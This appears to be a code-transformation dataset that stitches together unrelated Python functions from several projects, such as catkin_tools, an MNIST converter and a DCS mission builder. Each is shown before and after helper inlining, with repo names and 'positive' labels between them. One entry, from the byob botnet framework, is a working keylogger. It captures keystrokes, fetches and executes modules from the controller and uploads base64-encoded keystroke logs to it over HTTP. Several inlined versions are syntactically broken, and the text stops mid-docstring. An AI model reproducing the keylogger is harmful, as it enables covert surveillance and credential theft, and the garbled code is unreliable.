devel_collisions_file_path = os.path.join(metadata_path, 'devel_collisions.txt')
dest_collisions = dict()
if os.path.exists(devel_collisions_file_path):
with open(devel_collisions_file_path, 'r') as collisions_file:
collisions_reader = csv.reader(collisions_file, delimiter=' ', quotechar='"')
dest_collisions = dict([(path, int(count)) for (path, count) in collisions_reader])
for dest_file in files_that_collide:
if dest_file in dest_collisions:
dest_collisions[dest_file] += 1
else:
dest_collisions[dest_file] = 1
for dest_file in files_to_clean:
n_collisions = dest_collisions.get(dest_file, 0)
if n_collisions == 0:
logger.out('Unlinking: {}'.format(dest_file))
if not False:
if os.path.exists(dest_file):
try:
os.unlink(dest_file)
except OSError:
logger.err('Could not unlink: {}'.format(dest_file))
raise
try:
os.removedirs(os.path.split(dest_file)[0])
except OSError:
pass
else:
logger.out('Already unlinked: {}')
if n_collisions > 1:
dest_collisions[dest_file] -= 1
elif n_collisions == 1:
del dest_collisions[dest_file]
if not False:
with open(devel_collisions_file_path, 'w') as collisions_file:
collisions_writer = csv.writer(collisions_file, delimiter=' ', quotechar='"')
for (dest_file, count) in dest_collisions.items():
collisions_writer.writerow([dest_file, count])
</DeepExtract>
except:
logger.err('Could not clean linked files.')
raise
with open(devel_manifest_file_path, 'w') as devel_manifest:
devel_manifest.write('%s\n' % package_path)
manifest_writer = csv.writer(devel_manifest, delimiter=' ', quotechar='"')
for (source_file, dest_file) in products:
manifest_writer.writerow([source_file, dest_file])
return 0
|
def link_devel_products(logger, event_queue, package, package_path, devel_manifest_path, source_devel_path, dest_devel_path, metadata_path, prebuild):
"""Link files from an isolated devel space into a merged one.
This creates directories and symlinks in a merged devel space to a
package's linked devel space.
"""
mkdir_p(devel_manifest_path)
devel_manifest_file_path = os.path.join(devel_manifest_path, DEVEL_MANIFEST_FILENAME)
products = list()
files_to_clean = []
files_that_collide = []
skiplist = DEVEL_LINK_PREBUILD_SKIPLIST if prebuild else DEVEL_LINK_SKIPLIST
def should_skip_file(filename):
if os.path.relpath(os.path.join(source_path, filename), source_devel_path) in skiplist:
return True
for directory in os.path.relpath(os.path.join(source_path, filename), source_devel_path).split(os.path.sep):
if directory in DEVEL_LINK_SKIP_DIRECTORIES:
return True
return False
for (source_path, dirs, files) in os.walk(source_devel_path):
dest_path = os.path.join(dest_devel_path, os.path.relpath(source_path, source_devel_path))
for dirname in dirs:
if dirname in DEVEL_LINK_SKIP_DIRECTORIES:
continue
source_dir = os.path.join(source_path, dirname)
dest_dir = os.path.join(dest_path, dirname)
if os.path.islink(source_dir):
products.append((source_dir, dest_dir))
if os.path.exists(dest_dir):
if os.path.realpath(dest_dir) != os.path.realpath(source_dir):
files_that_collide.append(dest_dir)
else:
logger.out('Linked: ({}, {})'.format(source_dir, dest_dir))
else:
logger.out('Symlinking %s' % dest_dir)
try:
os.symlink(source_dir, dest_dir)
except OSError:
logger.err('Could not create symlink `{}` referencing `{}`'.format(dest_dir, source_dir))
raise
elif not os.path.exists(dest_dir):
os.mkdir(dest_dir)
elif not os.path.isdir(dest_dir):
logger.err('Error: Cannot create directory: {}'.format(dest_dir))
return -1
for filename in files:
if should_skip_file(filename):
continue
source_file = os.path.join(source_path, filename)
dest_file = os.path.join(dest_path, filename)
products.append((source_file, dest_file))
if os.path.exists(dest_file):
if os.path.realpath(dest_file) != os.path.realpath(source_file):
source_hash = md5(open(os.path.realpath(source_file), 'rb').read()).hexdigest()
dest_hash = md5(open(os.path.realpath(dest_file), 'rb').read()).hexdigest()
if dest_hash != source_hash:
logger.err('Warning: Cannot symlink from %s to existing file %s' % (source_file, dest_file))
logger.err('Warning: Source hash: {}'.format(source_hash))
logger.err('Warning: Dest hash: {}'.format(dest_hash))
files_that_collide.append(dest_file)
else:
logger.out('Linked: ({}, {})'.format(source_file, dest_file))
else:
logger.out('Symlinking %s' % dest_file)
try:
os.symlink(source_file, dest_file)
except OSError:
logger.err('Could not create symlink `{}` referencing `{}`'.format(dest_file, source_file))
raise
if os.path.exists(devel_manifest_file_path):
with open(devel_manifest_file_path, 'r') as devel_manifest:
manifest_reader = csv.reader(devel_manifest, delimiter=' ', quotechar='"')
devel_manifest.readline()
for (source_file, dest_file) in manifest_reader:
if (source_file, dest_file) not in products:
logger.out('Cleaning: (%s, %s)' % (source_file, dest_file))
files_to_clean.append(dest_file)
try:
devel_collisions_file_path = os.path.join(metadata_path, 'devel_collisions.txt')
dest_collisions = dict()
if os.path.exists(devel_collisions_file_path):
with open(devel_collisions_file_path, 'r') as collisions_file:
collisions_reader = csv.reader(collisions_file, delimiter=' ', quotechar='"')
dest_collisions = dict([(path, int(count)) for (path, count) in collisions_reader])
for dest_file in files_that_collide:
if dest_file in dest_collisions:
dest_collisions[dest_file] += 1
else:
dest_collisions[dest_file] = 1
for dest_file in files_to_clean:
n_collisions = dest_collisions.get(dest_file, 0)
if n_collisions == 0:
logger.out('Unlinking: {}'.format(dest_file))
if not False:
if os.path.exists(dest_file):
try:
os.unlink(dest_file)
except OSError:
logger.err('Could not unlink: {}'.format(dest_file))
raise
try:
os.removedirs(os.path.split(dest_file)[0])
except OSError:
pass
else:
logger.out('Already unlinked: {}')
if n_collisions > 1:
dest_collisions[dest_file] -= 1
elif n_collisions == 1:
del dest_collisions[dest_file]
if not False:
with open(devel_collisions_file_path, 'w') as collisions_file:
collisions_writer = csv.writer(collisions_file, delimiter=' ', quotechar='"')
for (dest_file, count) in dest_collisions.items():
collisions_writer.writerow([dest_file, count])
except:
logger.err('Could not clean linked files.')
raise
with open(devel_manifest_file_path, 'w') as devel_manifest:
devel_manifest.write('%s\n' % package_path)
manifest_writer = csv.writer(devel_manifest, delimiter=' ', quotechar='"')
for (source_file, dest_file) in products:
manifest_writer.writerow([source_file, dest_file])
return 0
|
catkin_tools
|
positive
|
@config(platforms=['win32', 'linux', 'linux2', 'darwin'], command=True, usage='keylogger [mode]')
def keylogger(self, mode=None):
"""
Log user keystrokes
`Required`
:param str mode: run, stop, status, upload
"""
def status():
try:
length = globals()['keylogger'].logs.tell()
return 'Log size: {} bytes'.format(length)
except Exception as e:
<DeepExtract>
logging.basicConfig(level=logging.DEBUG, handlers=[logging.StreamHandler()])
logger = logging.getLogger(__name__)
getattr(logger, level)(str('{} error: {}'.format('keylogger.status', str(e)))) if hasattr(logger, level) else logger.debug(str('{} error: {}'.format('keylogger.status', str(e))))
</DeepExtract>
if 'keylogger' not in globals():
<DeepExtract>
'keylogger' = str('keylogger').split()
if len('keylogger') == 1:
(module, target) = ('keylogger'[0], '')
elif len('keylogger') == 2:
(module, target) = 'keylogger'
else:
return 'usage: {}'.format(self.load.usage)
target = globals()[target].__dict__ if bool(target in globals() and hasattr(target, '__dict__')) else globals()
(host, port) = self.connection.getpeername()
base_url_1 = 'http://{}:{}'.format(host, port + 1)
base_url_2 = 'http://{}:{}'.format(host, port + 2)
with globals()['remote_repo'](self.remote['packages'], base_url_2):
with globals()['remote_repo'](self.remote['modules'], base_url_1):
try:
exec('import {}'.format(module), target)
log('[+] {} remotely imported'.format(module))
return '[+] {} remotely imported'.format(module)
except Exception as e:
log('{} error: {}'.format(self.load.__name__, str(e)))
return '{} error: {}'.format(self.load.__name__, str(e))
</DeepExtract>
if not mode:
if 'keylogger' not in self.handlers:
return globals()['keylogger'].usage
else:
return locals()['status']()
elif 'run' in mode or 'start' in mode:
if 'keylogger' not in self.handlers:
self.handlers['keylogger'] = globals()['keylogger'].run()
return locals()['status']()
else:
return locals()['status']()
elif 'stop' in mode:
try:
<DeepExtract>
try:
if 'keylogger' in self.handlers:
_ = self.handlers.pop('keylogger', None)
del _
return "Job '{}' was stopped.".format('keylogger')
else:
return "Job '{}' not found".format('keylogger')
except Exception as e:
log('{} error: {}'.format(self.stop.__name__, str(e)))
</DeepExtract>
except:
pass
try:
<DeepExtract>
try:
if 'keylogger' in self.handlers:
_ = self.handlers.pop('keylogger', None)
del _
return "Job '{}' was stopped.".format('keylogger')
else:
return "Job '{}' not found".format('keylogger')
except Exception as e:
log('{} error: {}'.format(self.stop.__name__, str(e)))
</DeepExtract>
except:
pass
return locals()['status']()
elif 'upload' in mode:
(host, port) = self.connection.getpeername()
data = base64.b64encode(globals()['keylogger'].logs.getvalue())
json_data = {'data': str(data), 'owner': self.owner, 'type': 'txt', 'module': self.keylogger.__name__, 'session': self.info.get('public_ip')}
globals()['post']('http://{}:{}'.format(host, port + 3), json=json_data)
globals()['keylogger'].logs.reset()
return 'Keystroke log upload complete'
elif 'status' in mode:
return locals()['status']()
else:
return keylogger.usage
|
@config(platforms=['win32', 'linux', 'linux2', 'darwin'], command=True, usage='keylogger [mode]')
def keylogger(self, mode=None):
"""
Log user keystrokes
`Required`
:param str mode: run, stop, status, upload
"""
def status():
try:
length = globals()['keylogger'].logs.tell()
return 'Log size: {} bytes'.format(length)
except Exception as e:
logging.basicConfig(level=logging.DEBUG, handlers=[logging.StreamHandler()])
logger = logging.getLogger(__name__)
getattr(logger, level)(str('{} error: {}'.format('keylogger.status', str(e)))) if hasattr(logger, level) else logger.debug(str('{} error: {}'.format('keylogger.status', str(e))))
if 'keylogger' not in globals():
'keylogger' = str('keylogger').split()
if len('keylogger') == 1:
(module, target) = ('keylogger'[0], '')
elif len('keylogger') == 2:
(module, target) = 'keylogger'
else:
return 'usage: {}'.format(self.load.usage)
target = globals()[target].__dict__ if bool(target in globals() and hasattr(target, '__dict__')) else globals()
(host, port) = self.connection.getpeername()
base_url_1 = 'http://{}:{}'.format(host, port + 1)
base_url_2 = 'http://{}:{}'.format(host, port + 2)
with globals()['remote_repo'](self.remote['packages'], base_url_2):
with globals()['remote_repo'](self.remote['modules'], base_url_1):
try:
exec('import {}'.format(module), target)
log('[+] {} remotely imported'.format(module))
return '[+] {} remotely imported'.format(module)
except Exception as e:
log('{} error: {}'.format(self.load.__name__, str(e)))
return '{} error: {}'.format(self.load.__name__, str(e))
if not mode:
if 'keylogger' not in self.handlers:
return globals()['keylogger'].usage
else:
return locals()['status']()
elif 'run' in mode or 'start' in mode:
if 'keylogger' not in self.handlers:
self.handlers['keylogger'] = globals()['keylogger'].run()
return locals()['status']()
else:
return locals()['status']()
elif 'stop' in mode:
try:
try:
if 'keylogger' in self.handlers:
_ = self.handlers.pop('keylogger', None)
del _
return "Job '{}' was stopped.".format('keylogger')
else:
return "Job '{}' not found".format('keylogger')
except Exception as e:
log('{} error: {}'.format(self.stop.__name__, str(e)))
except:
pass
try:
try:
if 'keylogger' in self.handlers:
_ = self.handlers.pop('keylogger', None)
del _
return "Job '{}' was stopped.".format('keylogger')
else:
return "Job '{}' not found".format('keylogger')
except Exception as e:
log('{} error: {}'.format(self.stop.__name__, str(e)))
except:
pass
return locals()['status']()
elif 'upload' in mode:
(host, port) = self.connection.getpeername()
data = base64.b64encode(globals()['keylogger'].logs.getvalue())
json_data = {'data': str(data), 'owner': self.owner, 'type': 'txt', 'module': self.keylogger.__name__, 'session': self.info.get('public_ip')}
globals()['post']('http://{}:{}'.format(host, port + 3), json=json_data)
globals()['keylogger'].logs.reset()
return 'Keystroke log upload complete'
elif 'status' in mode:
return locals()['status']()
else:
return keylogger.usage
|
byob
|
positive
|
def test__parse_params_and_execute_algorithm(self):
<DeepExtract>
argv_dict = {'--data-directory': data_dir, '--exchanges': 'kraken', '--symbol': 'BTC/USD', '--start-date': '2001'}
argv_dict.update({'--start-balances': '{"okex": {"ETH": 3}, "kraken": {"USD": 100}}', '--exchanges': 'kraken,okex', '--symbols': '', '--start-date': '2019-10-01 10:10', '--end-date': '2019-10-01 10:16', '--algo-bool': True, '--some-string': 'testSTR', '--interval': '2m'})
sys_argv = ['file.py']
for (x, y) in argv_dict.items():
if y is None:
continue
sys_argv.append(x)
if y is not True:
sys_argv.append(y)
sys_argv = sys_argv
</DeepExtract>
with patch.object(sys, 'argv', sys_argv):
with self.assertLogs():
result = parse_params_and_execute_algorithm(TestAlgo)
assert_test_algo_result(self, result, live=True)
self.assertEqual(result.args.algo_bool, True)
self.assertEqual(result.args.some_string, 'testSTR')
self.assertEqual(result.args.live, False)
|
def test__parse_params_and_execute_algorithm(self):
argv_dict = {'--data-directory': data_dir, '--exchanges': 'kraken', '--symbol': 'BTC/USD', '--start-date': '2001'}
argv_dict.update({'--start-balances': '{"okex": {"ETH": 3}, "kraken": {"USD": 100}}', '--exchanges': 'kraken,okex', '--symbols': '', '--start-date': '2019-10-01 10:10', '--end-date': '2019-10-01 10:16', '--algo-bool': True, '--some-string': 'testSTR', '--interval': '2m'})
sys_argv = ['file.py']
for (x, y) in argv_dict.items():
if y is None:
continue
sys_argv.append(x)
if y is not True:
sys_argv.append(y)
sys_argv = sys_argv
with patch.object(sys, 'argv', sys_argv):
with self.assertLogs():
result = parse_params_and_execute_algorithm(TestAlgo)
assert_test_algo_result(self, result, live=True)
self.assertEqual(result.args.algo_bool, True)
self.assertEqual(result.args.some_string, 'testSTR')
self.assertEqual(result.args.live, False)
|
btrccts
|
positive
|
def launch_all_avd_sequentially(self):
for device in self.device_store.get_devices():
if isinstance(device, SessionVirtualDevice) and device.status == 'not-launched':
session_logger.log_device_launch_start_time(device.adb_name)
device.launch()
<DeepExtract>
Printer.system_message(self.TAG, 'Waiting until (' + ' '.join(("'" + device.adb_name + "'" for device in (device,))) + ") devices status will change to '" + 'device' + "'.")
timeout = GlobalConfig.AVD_ADB_BOOT_TIMEOUT
start_time = last_scan_ended = time.time() * 1000
while True:
current_time = time.time() * 1000
if current_time - last_scan_ended >= GlobalConfig.ADB_SCAN_INTERVAL or start_time == last_scan_ended:
Printer.system_message(self.TAG, 'Scanning...')
self.device_store.update_model_statuses()
Printer.system_message(self.TAG, ' * Current wait status:')
for device in (device,):
Printer.system_message(self.TAG, ' ' + device.adb_name + ' ' + Color.GREEN + "('" + device.status + "')")
if all((device.status == 'device' for device in (device,))):
break
last_scan_ended = time.time() * 1000
if current_time - start_time >= timeout:
message = 'Devices took longer than {} seconds to launch (ADB launch). Timeout quit.'
message = message.format(str(timeout))
raise LauncherFlowInterruptedException(self.TAG, message)
Printer.system_message(self.TAG, 'ADB wait finished with success!')
</DeepExtract>
<DeepExtract>
Printer.system_message(self.TAG, "Waiting for 'dev.bootcomplete', 'sys.boot_completed', 'init.svc.bootanim', properties of devices (" + ' '.join(("'" + device.adb_name + "'" for device in self.device_store.get_devices())) + ').')
device_statuses = dict()
for device in self.device_store.get_devices():
device_statuses.update({device.adb_name: None})
start_time = last_scan_ended = time.time() * 1000
while True:
current_time = time.time() * 1000
if current_time - last_scan_ended >= GlobalConfig.ADB_SCAN_INTERVAL or start_time == last_scan_ended:
Printer.system_message(self.TAG, 'Scanning...')
for device in self.device_store.get_devices():
if device in self.device_store.get_devices():
dev_boot = self.adb_shell_controller.get_property(device.adb_name, 'dev.bootcomplete').strip()
sys_boot = self.adb_shell_controller.get_property(device.adb_name, 'sys.boot_completed').strip()
boot_anim = self.adb_shell_controller.get_property(device.adb_name, 'init.svc.bootanim').strip()
boot_finished = dev_boot == '1' and sys_boot == '1' and (boot_anim == 'stopped')
device_statuses.update({device.adb_name: {'dev.bootcomplete': dev_boot, 'sys.boot_completed': sys_boot, 'init.svc.bootanim': boot_anim, 'boot_finished': boot_finished}})
if boot_finished:
session_logger.log_device_launch_end_time(device.adb_name)
Printer.system_message(self.TAG, ' * Current wait status:')
for (device_name, status_dict) in device_statuses.items():
bcplte = str(status_dict['dev.bootcomplete'] if status_dict['dev.bootcomplete'] != '' else '0')
bcplted = str(status_dict['sys.boot_completed'] if status_dict['sys.boot_completed'] != '' else '0')
banim = str(status_dict['init.svc.bootanim'])
launched_status = 'launched' if status_dict['boot_finished'] else 'not-launched'
Printer.system_message(self.TAG, ' ' + device_name + ' properties: ' + "('dev.bootcomplete' : " + bcplte + ', ' + "'sys.boot_completed' : " + bcplted + ', ' + "'init.svc.bootanim' : " + banim + ') - ' + Color.GREEN + launched_status + Color.BLUE)
if all((status_dict['boot_finished'] for status_dict in device_statuses.values())):
break
last_scan_ended = time.time() * 1000
if current_time - start_time >= GlobalConfig.AVD_SYSTEM_BOOT_TIMEOUT:
message = 'Devices took longer than seconds to launch (Property launch). Timeout quit.'
message = message.format(str(GlobalConfig.AVD_SYSTEM_BOOT_TIMEOUT))
raise LauncherFlowInterruptedException(self.TAG, message)
Printer.system_message(self.TAG, 'Property launch finished with success!')
</DeepExtract>
|
def launch_all_avd_sequentially(self):
for device in self.device_store.get_devices():
if isinstance(device, SessionVirtualDevice) and device.status == 'not-launched':
session_logger.log_device_launch_start_time(device.adb_name)
device.launch()
Printer.system_message(self.TAG, 'Waiting until (' + ' '.join(("'" + device.adb_name + "'" for device in (device,))) + ") devices status will change to '" + 'device' + "'.")
timeout = GlobalConfig.AVD_ADB_BOOT_TIMEOUT
start_time = last_scan_ended = time.time() * 1000
while True:
current_time = time.time() * 1000
if current_time - last_scan_ended >= GlobalConfig.ADB_SCAN_INTERVAL or start_time == last_scan_ended:
Printer.system_message(self.TAG, 'Scanning...')
self.device_store.update_model_statuses()
Printer.system_message(self.TAG, ' * Current wait status:')
for device in (device,):
Printer.system_message(self.TAG, ' ' + device.adb_name + ' ' + Color.GREEN + "('" + device.status + "')")
if all((device.status == 'device' for device in (device,))):
break
last_scan_ended = time.time() * 1000
if current_time - start_time >= timeout:
message = 'Devices took longer than {} seconds to launch (ADB launch). Timeout quit.'
message = message.format(str(timeout))
raise LauncherFlowInterruptedException(self.TAG, message)
Printer.system_message(self.TAG, 'ADB wait finished with success!')
Printer.system_message(self.TAG, "Waiting for 'dev.bootcomplete', 'sys.boot_completed', 'init.svc.bootanim', properties of devices (" + ' '.join(("'" + device.adb_name + "'" for device in self.device_store.get_devices())) + ').')
device_statuses = dict()
for device in self.device_store.get_devices():
device_statuses.update({device.adb_name: None})
start_time = last_scan_ended = time.time() * 1000
while True:
current_time = time.time() * 1000
if current_time - last_scan_ended >= GlobalConfig.ADB_SCAN_INTERVAL or start_time == last_scan_ended:
Printer.system_message(self.TAG, 'Scanning...')
for device in self.device_store.get_devices():
if device in self.device_store.get_devices():
dev_boot = self.adb_shell_controller.get_property(device.adb_name, 'dev.bootcomplete').strip()
sys_boot = self.adb_shell_controller.get_property(device.adb_name, 'sys.boot_completed').strip()
boot_anim = self.adb_shell_controller.get_property(device.adb_name, 'init.svc.bootanim').strip()
boot_finished = dev_boot == '1' and sys_boot == '1' and (boot_anim == 'stopped')
device_statuses.update({device.adb_name: {'dev.bootcomplete': dev_boot, 'sys.boot_completed': sys_boot, 'init.svc.bootanim': boot_anim, 'boot_finished': boot_finished}})
if boot_finished:
session_logger.log_device_launch_end_time(device.adb_name)
Printer.system_message(self.TAG, ' * Current wait status:')
for (device_name, status_dict) in device_statuses.items():
bcplte = str(status_dict['dev.bootcomplete'] if status_dict['dev.bootcomplete'] != '' else '0')
bcplted = str(status_dict['sys.boot_completed'] if status_dict['sys.boot_completed'] != '' else '0')
banim = str(status_dict['init.svc.bootanim'])
launched_status = 'launched' if status_dict['boot_finished'] else 'not-launched'
Printer.system_message(self.TAG, ' ' + device_name + ' properties: ' + "('dev.bootcomplete' : " + bcplte + ', ' + "'sys.boot_completed' : " + bcplted + ', ' + "'init.svc.bootanim' : " + banim + ') - ' + Color.GREEN + launched_status + Color.BLUE)
if all((status_dict['boot_finished'] for status_dict in device_statuses.values())):
break
last_scan_ended = time.time() * 1000
if current_time - start_time >= GlobalConfig.AVD_SYSTEM_BOOT_TIMEOUT:
message = 'Devices took longer than seconds to launch (Property launch). Timeout quit.'
message = message.format(str(GlobalConfig.AVD_SYSTEM_BOOT_TIMEOUT))
raise LauncherFlowInterruptedException(self.TAG, message)
Printer.system_message(self.TAG, 'Property launch finished with success!')
</DeepExtract>
|
AutomationTestSupervisor
|
positive
|
def run(dataset_dir):
"""Runs the download and conversion operation.
Args:
dataset_dir: The dataset directory where the dataset is stored.
"""
if not tf.gfile.Exists(dataset_dir):
tf.gfile.MakeDirs(dataset_dir)
<DeepExtract>
training_filename = '%s/mnist_%s.tfrecord' % (dataset_dir, 'train')
</DeepExtract>
<DeepExtract>
testing_filename = '%s/mnist_%s.tfrecord' % (dataset_dir, 'test')
</DeepExtract>
if tf.gfile.Exists(training_filename) and tf.gfile.Exists(testing_filename):
print('Dataset files already exist. Exiting without re-creating them.')
return
<DeepExtract>
for filename in [_TRAIN_DATA_FILENAME, _TRAIN_LABELS_FILENAME, _TEST_DATA_FILENAME, _TEST_LABELS_FILENAME]:
filepath = os.path.join(dataset_dir, filename)
if not os.path.exists(filepath):
print('Downloading file %s...' % filename)
def _progress(count, block_size, total_size):
sys.stdout.write('\r>> Downloading %.1f%%' % (float(count * block_size) / float(total_size) * 100.0))
sys.stdout.flush()
(filepath, _) = urllib.request.urlretrieve(_DATA_URL + filename, filepath, _progress)
print()
with tf.gfile.GFile(filepath) as f:
size = f.size()
print('Successfully downloaded', filename, size, 'bytes.')
</DeepExtract>
with tf.python_io.TFRecordWriter(training_filename) as tfrecord_writer:
data_filename = os.path.join(dataset_dir, _TRAIN_DATA_FILENAME)
labels_filename = os.path.join(dataset_dir, _TRAIN_LABELS_FILENAME)
<DeepExtract>
images = _extract_images(data_filename, 60000)
labels = _extract_labels(labels_filename, 60000)
shape = (_IMAGE_SIZE, _IMAGE_SIZE, _NUM_CHANNELS)
with tf.Graph().as_default():
image = tf.placeholder(dtype=tf.uint8, shape=shape)
encoded_png = tf.image.encode_png(image)
with tf.Session('') as sess:
for j in range(60000):
sys.stdout.write('\r>> Converting image %d/%d' % (j + 1, 60000))
sys.stdout.flush()
png_string = sess.run(encoded_png, feed_dict={image: images[j]})
example = dataset_utils.image_to_tfexample(png_string, 'png'.encode(), _IMAGE_SIZE, _IMAGE_SIZE, labels[j])
tfrecord_writer.write(example.SerializeToString())
</DeepExtract>
with tf.python_io.TFRecordWriter(testing_filename) as tfrecord_writer:
data_filename = os.path.join(dataset_dir, _TEST_DATA_FILENAME)
labels_filename = os.path.join(dataset_dir, _TEST_LABELS_FILENAME)
<DeepExtract>
images = _extract_images(data_filename, 10000)
labels = _extract_labels(labels_filename, 10000)
shape = (_IMAGE_SIZE, _IMAGE_SIZE, _NUM_CHANNELS)
with tf.Graph().as_default():
image = tf.placeholder(dtype=tf.uint8, shape=shape)
encoded_png = tf.image.encode_png(image)
with tf.Session('') as sess:
for j in range(10000):
sys.stdout.write('\r>> Converting image %d/%d' % (j + 1, 10000))
sys.stdout.flush()
png_string = sess.run(encoded_png, feed_dict={image: images[j]})
example = dataset_utils.image_to_tfexample(png_string, 'png'.encode(), _IMAGE_SIZE, _IMAGE_SIZE, labels[j])
tfrecord_writer.write(example.SerializeToString())
</DeepExtract>
labels_to_class_names = dict(zip(range(len(_CLASS_NAMES)), _CLASS_NAMES))
dataset_utils.write_label_file(labels_to_class_names, dataset_dir)
<DeepExtract>
for filename in [_TRAIN_DATA_FILENAME, _TRAIN_LABELS_FILENAME, _TEST_DATA_FILENAME, _TEST_LABELS_FILENAME]:
filepath = os.path.join(dataset_dir, filename)
tf.gfile.Remove(filepath)
</DeepExtract>
print('\nFinished converting the MNIST dataset!')
|
def run(dataset_dir):
"""Runs the download and conversion operation.
Args:
dataset_dir: The dataset directory where the dataset is stored.
"""
if not tf.gfile.Exists(dataset_dir):
tf.gfile.MakeDirs(dataset_dir)
training_filename = '%s/mnist_%s.tfrecord' % (dataset_dir, 'train')
testing_filename = '%s/mnist_%s.tfrecord' % (dataset_dir, 'test')
if tf.gfile.Exists(training_filename) and tf.gfile.Exists(testing_filename):
print('Dataset files already exist. Exiting without re-creating them.')
return
for filename in [_TRAIN_DATA_FILENAME, _TRAIN_LABELS_FILENAME, _TEST_DATA_FILENAME, _TEST_LABELS_FILENAME]:
filepath = os.path.join(dataset_dir, filename)
if not os.path.exists(filepath):
print('Downloading file %s...' % filename)
def _progress(count, block_size, total_size):
sys.stdout.write('\r>> Downloading %.1f%%' % (float(count * block_size) / float(total_size) * 100.0))
sys.stdout.flush()
(filepath, _) = urllib.request.urlretrieve(_DATA_URL + filename, filepath, _progress)
print()
with tf.gfile.GFile(filepath) as f:
size = f.size()
print('Successfully downloaded', filename, size, 'bytes.')
with tf.python_io.TFRecordWriter(training_filename) as tfrecord_writer:
data_filename = os.path.join(dataset_dir, _TRAIN_DATA_FILENAME)
labels_filename = os.path.join(dataset_dir, _TRAIN_LABELS_FILENAME)
images = _extract_images(data_filename, 60000)
labels = _extract_labels(labels_filename, 60000)
shape = (_IMAGE_SIZE, _IMAGE_SIZE, _NUM_CHANNELS)
with tf.Graph().as_default():
image = tf.placeholder(dtype=tf.uint8, shape=shape)
encoded_png = tf.image.encode_png(image)
with tf.Session('') as sess:
for j in range(60000):
sys.stdout.write('\r>> Converting image %d/%d' % (j + 1, 60000))
sys.stdout.flush()
png_string = sess.run(encoded_png, feed_dict={image: images[j]})
example = dataset_utils.image_to_tfexample(png_string, 'png'.encode(), _IMAGE_SIZE, _IMAGE_SIZE, labels[j])
tfrecord_writer.write(example.SerializeToString())
with tf.python_io.TFRecordWriter(testing_filename) as tfrecord_writer:
data_filename = os.path.join(dataset_dir, _TEST_DATA_FILENAME)
labels_filename = os.path.join(dataset_dir, _TEST_LABELS_FILENAME)
images = _extract_images(data_filename, 10000)
labels = _extract_labels(labels_filename, 10000)
shape = (_IMAGE_SIZE, _IMAGE_SIZE, _NUM_CHANNELS)
with tf.Graph().as_default():
image = tf.placeholder(dtype=tf.uint8, shape=shape)
encoded_png = tf.image.encode_png(image)
with tf.Session('') as sess:
for j in range(10000):
sys.stdout.write('\r>> Converting image %d/%d' % (j + 1, 10000))
sys.stdout.flush()
png_string = sess.run(encoded_png, feed_dict={image: images[j]})
example = dataset_utils.image_to_tfexample(png_string, 'png'.encode(), _IMAGE_SIZE, _IMAGE_SIZE, labels[j])
tfrecord_writer.write(example.SerializeToString())
labels_to_class_names = dict(zip(range(len(_CLASS_NAMES)), _CLASS_NAMES))
dataset_utils.write_label_file(labels_to_class_names, dataset_dir)
for filename in [_TRAIN_DATA_FILENAME, _TRAIN_LABELS_FILENAME, _TEST_DATA_FILENAME, _TEST_LABELS_FILENAME]:
filepath = os.path.join(dataset_dir, filename)
tf.gfile.Remove(filepath)
print('\nFinished converting the MNIST dataset!')
|
edafa
|
positive
|
def awacs_flight(self, country: Country, name: str, plane_type: Type[planes.PlaneType], airport: Optional[terrain_.Airport], position: mapping.Point, race_distance=30 * 1000, heading=90, altitude=4500, speed=550, start_type: StartType=StartType.Cold, frequency=140) -> unitgroup.FlyingGroup:
"""Add an AWACS flight group.
This is simple way to add an AWACS flight group to your mission.
It needs an initial orbit point, race distance and heading from this point.
If an airport is given the AWACS flight will start from there otherwise,
it will placed 2 km in front of the reference position.
Args:
country(Country): Country object the awacs group belongs to
name: of the AWACS flight
plane_type(PlaneType): AWACS plane type. e.g E_3A
airport(terrain_.Airport): starting airport, use None if you want it to spawn inflight
position(dcs.mapping.Point): reference point for the race-track
race_distance: distance for the race-track pattern
heading: direction from the referene position
altitude: of the AWACS race-track
speed: of the AWACS flight
start_type(StartType): of the flight if starts from airport
frequency: VHF-AM frequencey in mhz
Returns:
FlyingGroup: the created AWACS flight group
"""
if airport:
<DeepExtract>
if task.AWACS is None:
task.AWACS = plane_type.task_default
if task.AWACS is None:
raise ValueError(f'No main task was given and {plane_type.name} does not have a default task')
ag: unitgroup.FlyingGroup
if plane_type.helicopter:
ag = self.helicopter_group(name)
else:
ag = self.plane_group(name)
ag.task = task.AWACS.name
group_size = min(group_size, plane_type.group_size_max)
for i in range(1, group_size + 1):
p = self.aircraft(name + ' Pilot #{nr}'.format(nr=i), plane_type, country)
ag.add_unit(p)
country.add_aircraft_group(self._flying_group_from_airport(country, ag, task.AWACS, airport, start_type, parking_slots))
awacs = ag
</DeepExtract>
wp = awacs.add_runway_waypoint(airport)
else:
p = position.point_from_heading((heading + 180) % 360, 2000)
<DeepExtract>
if task.AWACS is None:
task.AWACS = plane_type.task_default
if task.AWACS is None:
raise ValueError(f'No main task was given and {plane_type.name} does not have a default task')
ag: unitgroup.FlyingGroup
if plane_type.helicopter:
ag = self.helicopter_group(name)
speed = speed if speed else 200
else:
ag = self.plane_group(name)
speed = speed if speed else 600
ag.task = task.AWACS.name
group_size = min(group_size, plane_type.group_size_max)
for i in range(1, group_size + 1):
p = self.aircraft(name + ' Pilot #{nr}'.format(nr=i), plane_type, country)
p.position = copy.copy(p)
p.fuel = int(p.fuel * 0.9)
ag.add_unit(p)
country.add_aircraft_group(self._flying_group_inflight(country, ag, task.AWACS, altitude, speed))
awacs = ag
</DeepExtract>
p = position.point_from_heading(heading + 180, 1000)
wp = awacs.add_waypoint(p, altitude, speed)
wp.tasks.append(task.SetFrequencyCommand(frequency))
wp = awacs.add_waypoint(position, altitude, speed)
wp.tasks.append(task.OrbitAction(altitude, speed, task.OrbitAction.OrbitPattern.RaceTrack))
p = position.point_from_heading(heading, race_distance)
awacs.add_waypoint(p, altitude, speed)
return awacs
|
def awacs_flight(self, country: Country, name: str, plane_type: Type[planes.PlaneType], airport: Optional[terrain_.Airport], position: mapping.Point, race_distance=30 * 1000, heading=90, altitude=4500, speed=550, start_type: StartType=StartType.Cold, frequency=140) -> unitgroup.FlyingGroup:
"""Add an AWACS flight group.
This is simple way to add an AWACS flight group to your mission.
It needs an initial orbit point, race distance and heading from this point.
If an airport is given the AWACS flight will start from there otherwise,
it will placed 2 km in front of the reference position.
Args:
country(Country): Country object the awacs group belongs to
name: of the AWACS flight
plane_type(PlaneType): AWACS plane type. e.g E_3A
airport(terrain_.Airport): starting airport, use None if you want it to spawn inflight
position(dcs.mapping.Point): reference point for the race-track
race_distance: distance for the race-track pattern
heading: direction from the referene position
altitude: of the AWACS race-track
speed: of the AWACS flight
